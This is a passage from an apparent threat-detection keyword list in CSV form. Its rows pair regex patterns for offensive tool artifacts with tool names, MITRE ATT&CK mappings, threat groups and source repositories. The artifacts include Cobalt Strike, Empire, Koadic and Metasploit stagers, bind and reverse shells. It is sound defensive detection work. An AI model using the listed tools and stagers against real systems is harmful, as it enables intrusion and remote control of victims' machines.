Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60217"
"*stage_transform_x86_strrep1*",".{0,1000}stage_transform_x86_strrep1.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","N/A","10","10","657","88","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z","60218"
"*stage1-remotepipelist.py*",".{0,1000}stage1\-remotepipelist\.py.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","N/A","10","10","1213","204","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z","60219"
"*Stage-gSharedInfoBitmap*",".{0,1000}Stage\-gSharedInfoBitmap.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-MS16135.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60220"
"*stageless payload*",".{0,1000}stageless\spayload.{0,1000}","offensive_tool_keyword","cobaltstrike","CACTUSTORCH: Payload Generation for Adversary Simulations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","N/A","N/A","10","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","60221"
"*Stageless payloads require the --rawscfile argument*",".{0,1000}Stageless\spayloads\srequire\sthe\s\-\-rawscfile\sargument.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","60222"
"*StageListenerCmd*",".{0,1000}StageListenerCmd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","60223"
"*stager/happy_x64.txt*",".{0,1000}stager\/happy_x64\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60224"
"*stager/happy_x86.txt*",".{0,1000}stager\/happy_x86\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60225"
"*stager/js/bitsadmin *",".{0,1000}stager\/js\/bitsadmin\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60226"
"*stager/js/disk*",".{0,1000}stager\/js\/disk.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60227"
"*stager/js/mshta*",".{0,1000}stager\/js\/mshta.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60228"
"*stager/js/regsvr *",".{0,1000}stager\/js\/regsvr\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60229"
"*stager/js/rundll32_js *",".{0,1000}stager\/js\/rundll32_js\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60230"
"*stager/js/wmic *",".{0,1000}stager\/js\/wmic\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","60231"
"*stager/sad_x64.txt*",".{0,1000}stager\/sad_x64\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60232"
"*stager/sad_x86.txt*",".{0,1000}stager\/sad_x86\.txt.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","60233"
"*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","60234"
"*stager_bind_pipe*",".{0,1000}stager_bind_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60235"
"*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","60236"
"*stager_bind_tcp*",".{0,1000}stager_bind_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60237"
"*stager_hidden_bind_tcp.asm*",".{0,1000}stager_hidden_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60238"
"*stager_reverse_https.bin*",".{0,1000}stager_reverse_https\.bin.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60239"
"*stager_sock_find.asm*",".{0,1000}stager_sock_find\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","60240"
"*stagers/*/aes.py*",".{0,1000}stagers\/.{0,1000}\/aes\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1048","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60241"
"*stagers/*/diffiehellman.py*",".{0,1000}stagers\/.{0,1000}\/diffiehellman\.py.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - 